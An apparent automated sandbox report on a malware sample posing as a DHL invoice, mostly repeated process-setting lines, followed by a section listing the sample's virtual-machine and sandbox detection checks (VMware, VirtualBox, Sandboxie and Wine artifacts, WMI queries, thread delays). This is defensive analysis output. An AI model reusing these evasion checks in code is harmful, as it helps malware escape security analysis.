            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\wextract.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAMEP
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory allocated: 2B47A4F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory allocated: 2B47BFE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sysJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sysJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sysJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578096E rdtsc 4_2_0578096E
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6465Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3136Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeWindow / User API: threadDelayed 2969Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeWindow / User API: threadDelayed 7004Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\wextract.exeAPI coverage: 3.0 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564Thread sleep count: 2969 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564Thread sleep time: -5938000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564Thread sleep count: 7004 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exe TID: 7564Thread sleep time: -14008000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe TID: 7584Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041C2A0 FindFirstFileW,FindNextFileW,FindClose,13_2_0041C2A0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
            Source: Amcache.hve.7.drBinary or memory string: VMware
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.7.drBinary or memory string: vmci.sys
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: wextract.exe, 0000000D.00000002.4139514530.0000000000705000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7#
            Source: Amcache.hve.7.drBinary or memory string: VMware20,1
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
            Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B40039F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B4000D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
